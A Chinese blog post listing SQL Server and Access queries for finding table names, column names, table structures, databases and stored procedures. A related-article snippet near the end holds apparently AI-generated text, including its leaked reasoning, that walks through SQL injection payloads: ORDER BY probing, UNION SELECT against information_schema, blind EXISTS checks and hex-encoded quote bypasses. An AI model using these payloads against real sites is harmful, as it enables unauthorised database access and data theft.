SQL 查找表名,字段名

最新推荐文章于 2023-03-08 10:09:34 发布
原创 最新推荐文章于 2023-03-08 10:09:34 发布 · 1.2w 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #table #sqlserver #sql server #properties #数据库

 

经常碰到一些忘记表名称的情况,此时只记得个大概,此时可通过查询系统表Sysobjects找到所要的表名,如要查找包含用户的表名,可通过以下SQL语句实现,

Select *
From sysobjects
Where name like '%user%'

如果知道列名,想查找包含有该列的表名,可加上系统表syscolumns来实现,如想查找列名中包含有user的所有表名,可通过以下SQL语句来实现
Select *
From sysobjects s
Where Exists(
Select *
From syscolumns
Where ID = s.ID and name like '%user%'
)

SQL SERVER

查看所有表名:
select    name    from    sysobjects    where    type='U'

查询表的所有字段名:
Select name from syscolumns Where ID=OBJECT_ID('表名')

select * from information_schema.tables
select * from information_schema.views
select * from information_schema.columns

ACCESS

查看所有表名:
select    name    from    MSysObjects    where    type=1    and    flags=0

MSysObjects是系统对象,默认情况是隐藏的。通过工具、选项、视图、显示、系统对象可以使之显示出来。  

1.获取表的基本字段属性

--获取SqlServer中表结构
SELECT syscolumns.name,systypes.name,syscolumns.isnullable,
syscolumns.length
FROM syscolumns, systypes
WHERE syscolumns.xusertype = systypes.xusertype
AND syscolumns.id = object_id('你的表名')

2.获取字段的描述信息

--获取SqlServer中表结构 主键,及描述
declare @table_name as varchar(max)
set @table_name = '你的表名'
select sys.columns.name, sys.types.name, sys.columns.max_length, sys.columns.is_nullable,
(select count(*) from sys.identity_columns where sys.identity_columns.object_id = sys.columns.object_id and sys.columns.column_id = sys.identity_columns.column_id) as is_identity ,
(select value from sys.extended_properties where sys.extended_properties.major_id = sys.columns.object_id and sys.extended_properties.minor_id = sys.columns.column_id) as description
from sys.columns, sys.tables, sys.types where sys.columns.object_id = sys.tables.object_id and sys.columns.system_type_id=sys.types.system_type_id andsys.tables.name=@table_name order by sys.columns.column_id

3.单独查询表的递增字段

--单独查询表递增字段
select [name] from syscolumns where
id=object_id(N'你的表名') and COLUMNPROPERTY(id,name,'IsIdentity')=1

4.获取表的主外键

--获取表主外键约束
exec sp_helpconstraint   '你的表名' ;

5.相当完整的表结构查询

--很全面的表结构
exec sp_helpconstraint   '你的表名' ;

SELECT 表名 = CASE a.colorder WHEN 1 THEN c.name ELSE '' END,

       序    = a.colorder,

       字段名= a.name,

       标识 = CASE COLUMNPROPERTY(a.id,a.name,'IsIdentity') WHEN 1 THEN '√' ELSE '' END,

       主键 = CASE

WHEN EXISTS ( SELECT * FROM sysobjects WHERE xtype='PK'

AND name IN (SELECT [name] FROM sysindexes   WHERE id=a.id

AND indid IN (SELECT indid FROM sysindexkeys WHERE id=a.id

AND colid IN (SELECT colid FROM syscolumns   WHERE id=a.id

AND name=a.name)))) THEN '√' ELSE '' END,

     类型= b.name,

     字节数= a.length,

     长度 = COLUMNPROPERTY(a.id,a.name,'Precision'),

     小数 = CASE ISNULL(COLUMNPROPERTY(a.id,a.name,'Scale'),0) WHEN 0 THEN '' ELSE CAST(COLUMNPROPERTY(a.id,a.name,'Scale') AS VARCHAR) END,

     允许空= CASE a.isnullable WHEN 1 THEN '√' ELSE '' END,

     默认值= ISNULL(d.[text],''),

     说明 = ISNULL(e.[value],'')

FROM syscolumns a

LEFT JOIN systypes b ON a.xtype=b.xusertype

INNER JOIN sysobjects c ON a.id=c.id AND c.xtype='U' AND c.name<>'dtproperties'

LEFT JOIN syscomments d ON a.cdefault=d.id

LEFT JOIN sys.extended_properties e ON a.id=e.class AND a.colid=e.minor_id

ORDER BY c.name, a.colorder

6.获取所有的库名

--获取服务器中的所遇库名

select * from master..sysdatabases

7.获取服务器上所有库的所有表

--获取服务器上所有库的所有表名

use master

declare @db_name varchar(100)

declare @sql varchar(200)

declare cur_tables cursor

for

select name from sysdatabases /*where name like 'by_%'*/

open cur_tables

fetch next from cur_tables into @db_name

while @@fetch_status = 0

begin

--set @db_name = @db_name + '.dbo.sysobjects'

print @db_name

set @sql = 'select * from ' + @db_name + '.dbo.sysobjects where xtype =''U'''

exec (@sql)

fetch next from cur_tables into @db_name

end

close cur_tables

deallocate cur_tables

go

紫色字体部分来自优快云博客http://blog.youkuaiyun.com/by84788186/archive/2008/12/09/3484555.aspx

1.按姓氏笔画排序:
Select * From TableName Order By CustomerName Collate Chinese_PRC_Stroke_ci_as

2.分页SQL语句
select * from(select (row_number() OVER (ORDER BY tab.ID Desc)) as rownum,tab.* from 表名 As tab) As t where rownum between 起始位置 And 结束位置

3.获取当前数据库中的所有用户表
select * from sysobjects where xtype='U' and category=0

4.获取某一个表的所有字段
select name from syscolumns where id=object_id('表名')

5.查看与某一个表相关的视图、存储过程、函数
select a.* from sysobjects a, syscomments b where a.id = b.id and b.text like '%表名%'

6.查看当前数据库中所有存储过程
select name as 存储过程名称 from sysobjects where xtype='P'

7.查询用户创建的所有数据库
select * from master..sysdatabases D where sid not in(select sid from master..syslogins where name='sa')
或者
select dbid, name AS DB_NAME from master..sysdatabases where sid <> 0x01

8.查询某一个表的字段和数据类型
select column_name,data_type from information_schema.columns
where table_name = '表名'

9.使用事务
在使用一些对数据库表的临时的SQL语句操作时,可以采用SQL SERVER事务处理,防止对数据操作后发现误操作问题
开始事务
Begin tran
Insert Into TableName Values(…)
SQL语句操作不正常,则回滚事务。
回滚事务
Rollback tran
SQL语句操作正常,则提交事务,数据提交至数据库。
提交事务
Commit tran
10. 按全文匹配方式查询
字段名 LIKE N'%[^a-zA-Z0-9]China[^a-zA-Z0-9]%'
OR 字段名 LIKE N'%[^a-zA-Z0-9]China'
OR 字段名 LIKE N'China[^a-zA-Z0-9]%'
OR 字段名 LIKE N'China

11.计算执行SQL语句查询时间
declare @d datetime
set @d=getdate()
select * from SYS_ColumnProperties select [语句执行花费时间(毫秒)]=datediff(ms,@d,getdate())

12、说明:几个高级查询运算词
A: UNION 运算符
UNION 运算符通过组合其他两个结果表(例如 TABLE1 和 TABLE2)并消去表中任何重复行而派生出一个结果表。当 ALL 随 UNION 一起使用时(即 UNION ALL),不消除重复行。两种情况下,派生表的每一行不是来自 TABLE1 就是来自 TABLE2。
B: EXCEPT 运算符
EXCEPT 运算符通过包括所有在 TABLE1 中但不在 TABLE2 中的行并消除所有重复行而派生出一个结果表。当 ALL 随 EXCEPT 一起使用时 (EXCEPT ALL),不消除重复行。
C: INTERSECT 运算符
INTERSECT 运算符通过只包括 TABLE1 和 TABLE2 中都有的行并消除所有重复行而派生出一个结果表。当 ALL 随 INTERSECT 一起使用时 (INTERSECT ALL),不消除重复行。

[MSSQL]SQL 查找表字段名
德仔
09-14 7247
正 文: 经常碰到一些忘记的情况,此时只记得个大概,此时可通过查询系统Sysobjects找到所要的,如要查找包含用户的,可通过以下SQL语句实现,Select * From sysobjects Where name like ‘%user%’如果知道列,想查找包含有该列的,可加上系统syscolumns来实现,如想查找列中包含有user的所有,可通过以下S
mysqlsql server 查询字段名 数据类型 和字段长度
u013558123的博客
02-20 9320
mysqlsql server 查询字段名 数据类型 和字段长度
SQL查询包含某个字段的所有
05-02
SQL查询包含某个字段的所有 SQL查询包含某个字段的所有 在查询分析器中选中目标数据库,执行以下语句。
sql语句查询字段名
seawavecau的专栏
12-14 5592
select name from syscolumns where id in (select id from sysobjects where type = u and name = 相应)  用以上sql语句输入相应就可以查到字段名,对应好数据库 查询是否存在该语句if exists (select * from dbo.sysobjects where id = o
SQL查询数据库字段名
架构师:通透,才能写出好代码!
03-08 5171
SQL查询数据库字段名
使用SQL语句查询MySQL,SQLServer,Oracle所有数据库,字段名
09-09
数据库管理中,有时我们需要获取特定数据库系统的所有数据库以及字段名。这篇文章将详细介绍如何使用SQL语句在MySQLSQL Server和Oracle数据库中进行这样的查询。 首先,我们来看MySQL。MySQL提供了`...
SQL提取数据库字段名等信息代码示例
12-16
SQL中,提取数据库字段名等信息是数据库管理的重要部分,这有助于了解数据库结构,进行数据操作和分析。以下是一些关于如何使用SQL语句获取这些信息的详细说明: 1. **查询所有**: - 在SQL Server中...
在多中查找一个或者字段名SQL 语句
08-05
#### 查找表包含特定字符串的SQL语句 在Oracle数据库中,如果你想找出所有中包含特定字符串的,可以使用以下SQL语句: ```sql SELECT * FROM user_tab_cols WHERE table_name LIKE '%STH%'; ``` 这里的关键...
精选资源
SQL Server查找表或列中包含空格的和列实例代码
01-19
本文主要给大家介绍的是关于SQL Server查找包含空格的和列的相关内容,为什么会有这篇文章,是因为最近发现一个数据库中的某个有个字段名后面包含了一个空格,这个空格引起了一些小问题,一般出现这种情况,是...
SQL获取所有用户,数据库、所有、所有字段名及字段类型
painss的专栏
07-06 7811
SQL获取所有用户,数据库、所有、所有字段名及字段类型2009-03-14 10:481.获取所有用户:SELECT name FROM Sysusers where status=2 and islogin=1islogin=1示帐户islogin=0示角色status=2示用户帐户status=0示糸统帐户2.获取所有数据库
SQL中查询中包含的字段名
热门推荐
CoffeMilk的博客
05-10 2万+
一、SQL SERVER 1、查看所有: select name from sysobjects where type='U' 2、查询的所有字段名: Select name from syscolumns Where ID=OBJECT_ID('') select * from information_schema.tables select * from information_schema.views select * from information_schema.colu
SQL 查找表 字段名
weixin_30279315的博客
06-11 313
转载:http://www.accessoft.com/article-show.asp?id=6135 经常碰到一些忘记的情况,此时只记得个大概,此时可通过查询系统Sysobjects找到所要的,如要查找包含用户的,可通过以下SQL语句实现, Select *From sysobjectsWhere name like '%user%' 如果知道列,想查找包含有该列的...
模糊查询关键字不区分大小写_2sql简单查询
weixin_35147304的博客
12-25 316
2.1基本的查询语句select<列1>,<列2>... ——select子句from<>; ——from子句查询所有的列select*from<>;为列设置别select 姓 as s_name,性别 as人类性别from s...
case when 子查询_转型电商数据分析全记录——SQL查询
weixin_39636411的博客
11-22 214
这一节会介绍之间的运算,包括的加法,的联结和非常有用的CASE达式。1、的加法使用UNION子句对两张进行合并计算,相当于在一张里“添加行”。具体见下图:tips:1)使用UNION合并两张,重复的行会被删除,如果不想删除,则在UNION之后添加ALL关键字即可。2)两张的列数必须一致,对应列的数据类型也必须一致3)ORDER BY子句只能用在SELECT子句的最后,且只能用...
SQL 查找表字段名(转)
东方匠心的专栏
05-23 1万+
正 文: 经常碰到一些忘记的情况,此时只记得个大概,此时可通过查询系统Sysobjects找到所要的,如要查找包含用户的,可通过以下SQL语句实现, Select * From sysobjects Where name like '%user%' 如果知道列,想查找包含有该列的,可加上系统syscolumns来实现,如想查找列中包含有user的所有
SQL查询,的所有字段名
mrx1005的专栏
12-09 856
SQL SERVER 查看所有: select name from sysobjects where type=U 查询的所有字段名: Select name from syscolumns Where ID=OBJECT_ID() select * from information_schema.tables select *
SQL2000的应用
枫的专栏
09-14 1399
--1:获取当前数据库中的所有用户select Name from sysobjects where xtype=u and status>=0--2:获取某一个的所有字段select name from syscolumns where id=object_id()--3:查看与某一个相关的视图、存储过程、函数select a.* from sysobjects a, sysc
SQLSERVER如何获取一个数据库中的所有、一个中所有字段的
Kevin yan的专栏
02-26 1423
SQLSERVER如何获取一个数据库中的所有、一个中所有字段的   1.查询数据库中的所有数据库: SELECT Name FROM Master..SysDatabases ORDER BY Name 2.查询某个数据库中所有的: SELECT Name FROM SysObjects Where XType='U' ORDER BY Name
sql注入查找字段名的语句
最新发布
11-15
<think> 嗯,用户的问题是关于SQL注入中查找字段名的语句。我需要结合用户提供的引用内容来回答这个问题。 用户引用了四篇关于SQL注入的材料,其中引用[1]和[2]特别有用。引用[1]提到使用union select联合查询来获取数据库信息,需要猜测字段名。引用[2]具体展示了如何利用已知字段数来获取数据库,使用语句如"1' union select 1, database() #"。 用户的核心问题是如何查找字段名。根据SQL注入的原理,当已经确定字段数后,下一步就是获取字段名。在MySQL中,这可以通过查询information_schema数据库来实现。特别是information_schema.columns存储了所有字段信息。 我考虑设计一个标准的查询语句:在确定字段数后,使用union select结合查询information_schema.columns来获取字段名。例如:假设字段数是3个,可以构造如"1' union select 1, column_name, 3 from information_schema.columns where table_name='users' #"这样的语句。这里table_name参数需要替换为目标。 用户可能还需要知道如何获取,这可以通过查询information_schema.tables来实现。所以我也应该提供获取的示例语句作为补充。 需要注意的是,实际注入时需要根据字段数调整select后的参数个数,并注意显示位置。如果网页只显示部分结果,可能需要使用limit或偏移量来遍历所有结果。 为了更全面,我还应该提醒用户注意数据库版本差异,因为不同数据库的系统可能不同。同时强调这些技术仅用于授权测试,避免法律风险。 最后考虑如何组织回答:先解释原理,再给出具体语句示例,最后补充注意事项。这样既解决了用户问题,又提供了完整的技术背景。 </think> 在SQL注入中获取字段名(列)的核心方法是查询数据库的**元数据**(如MySQL的`information_schema.columns`)。以下是具体步骤和语句: ### 一、核心步骤 1. **确定字段数** 通过`ORDER BY`递增测试,直到页面报错或显示异常: ```sql ' ORDER BY 1-- ' ORDER BY 2-- ... /* 直到出现错误 */ ``` 假设确定字段数为 `3` 2. **获取** 查询目标数据库中的(假设数据库为 `web_db`): ```sql ' UNION SELECT 1, table_name, 3 FROM information_schema.tables WHERE table_schema='web_db'-- ``` 常见目标:`users`, `admin`, `customer` 等。 3. **获取字段名** 关键语句(以 `users` 为例): ```sql ' UNION SELECT 1, column_name, 3 FROM information_schema.columns WHERE table_schema='web_db' AND table_name='users'-- ``` - `column_name` 字段会返回目标的所有列(如 `username`, `password`) - 若网页仅显示一个位置,可用 `GROUP_CONCAT(column_name)` 合并结果: ```sql ' UNION SELECT 1, GROUP_CONCAT(column_name), 3 FROM information_schema.columns WHERE table_schema='web_db' AND table_name='users'-- ``` ### 二、其他技巧 1. **盲注场景**(无显错位时) 通过条件判断猜测字段名: ```sql ' AND EXISTS(SELECT * FROM information_schema.columns WHERE table_name='users' AND column_name LIKE 'pass%')-- ``` 2. **利用数据库特性** - **MySQL**: 必须访问 `information_schema` - **SQL Server**: 查询 `sys.columns` - **Oracle**: 查询 `ALL_TAB_COLUMNS` ### 三、防御与注意事项 1. 注入前需明确数据库类型(方法差异大)[^1][^3] 2. 实际注入中需绕过引号过滤(如用十六进制编码 `0x7573657273` 代替 `'users'`) 3. 该技术仅限授权测试,非法使用违法[^3][^4] > **示例攻击链**: > 字段数探测 → 获取数据库获取获取字段名 → 提取数据 > 如:`' UNION SELECT null, username, password FROM users-- `
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫气东来_999

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值